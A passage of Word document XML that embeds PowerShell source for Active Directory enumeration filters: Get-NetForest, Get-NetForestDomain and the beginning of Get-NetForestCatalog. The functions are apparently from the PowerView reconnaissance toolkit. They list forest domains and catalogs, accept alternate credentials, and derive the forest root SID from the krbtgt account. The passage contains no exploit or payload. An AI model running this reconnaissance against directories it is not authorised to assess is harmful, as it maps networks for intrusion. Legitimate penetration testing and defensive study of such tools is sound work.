    <w:p w14:paraId="2548C296" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="735DC14A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Get-NetForest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECD3B0D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525F55A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E65280E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="79BE72C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns a given forest object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4555DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="70FBF3F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Forest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCA8400" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5036BBDB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The forest name to query for, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED1A1D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2B399FED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB90822" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4179F3AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object of alternate credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E85AF80" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for connection to the target domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AAAD2B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="53C24B92" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDA1108" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCC3673" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetForest -Forest external.domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7451ABBF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7C36B3A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5996CB7C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09092858" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; "external.domain" | Get-NetForest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5D78B5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEC8F31" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="313E4A08" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAAD8DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4E8CD2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067D3BC5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Forest,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6AA220" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4EDA69E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1CEF26" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0F5BCB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01417688" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="476CF594" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if($Credential) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A16151F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3509D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "Using alternate credentials for Get-NetForest"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C79D88" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="19F319D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if(!$Forest) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E32FFC2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # if no domain is supplied, extract the logon domain from the PSCredential passed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258A873A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Forest = $Credential.GetNetworkCredential().Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E727610" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            Write-Verbose "Extracted domain '$Forest' from -Credential"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18283448" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596A7A48" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E20AF9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ForestContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $Forest, $Credential.UserName, $Credential.GetNetworkCredential().Password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECBE519" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F20C679" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276AFA5B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetForest($ForestContext)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E134C33" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555F23E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF06965" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "The specified forest '$Forest' does not exist, could not be contacted, there isn't an existing trust, or the specified credentials are invalid."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B082ECB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F7F931" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1F7F4E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72639725" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    elseif($Forest) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AA4F0A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ForestContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $Forest)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA7225A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDDA9F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetForest($ForestContext)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CD54D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613BE736" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5221E43F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "The specified forest '$Forest' does not exist, could not be contacted, or there isn't an existing trust."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793E38B9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            return $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63130A5D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C81870C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4026BB77" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F2917C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # otherwise use the current forest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC3FFEF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063E7561" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2529BFF7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4DB62346" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if($ForestObject) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F740547" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # get the SID of the forest root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FB4E43" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ForestSid = (New-Object System.Security.Principal.NTAccount($ForestObject.RootDomain,"krbtgt")).Translate([System.Security.Principal.SecurityIdentifier]).Value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F60F2C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Parts = $ForestSid -Split "-"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B0D29E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ForestSid = $Parts[0..$($Parts.length-2)] -join "-"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078CCF38" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ForestObject | Add-Member NoteProperty 'RootDomainSid' $ForestSid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF64653" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ForestObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F4B3B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779F8450" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA3F589" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="560F6801" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2815C309" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Get-NetForestDomain {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E7ED7C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8E9740" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324D26A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="54CFA0B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Return all domains for a given forest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C54749A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0F0A0AAB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Forest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4809FB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="59B39D13" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The forest name to query domain for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9DD943" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="74A4C6BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706933F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0EFBC648" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object of alternate credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF25E24" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for connection to the target domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C128ECD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7EFD34E5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E34102" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7341C177" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetForestDomain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA7E6F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="105491F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176F4F80" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="24499487" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetForestDomain -Forest external.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D3CD45" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19769BD2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="76449343" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD27896" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0868E717" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B76139B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Forest,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDAE844" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="580D5311" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12388F44" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDCE03F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A93A1BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2CB082C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $ForestObject = Get-NetForest -Forest $Forest -Credential $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A954809" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1BF948E7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if($ForestObject) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456E9245" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ForestObject.Domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEE3E6D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DDC1DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116385E5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="32145BAA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="520D4872" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Get-NetForestCatalog {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A12663" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4A9029" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568959D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6E47C0D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Return all global catalogs for a given forest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BD624D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6971035B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Forest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9A9CAA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="59790118" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The forest name to query domain for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122BDFAC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="383076D1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364B05A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="77245CFC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object of alternate credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49102BC7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for connection to the target domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6C516E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="327C9E29" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
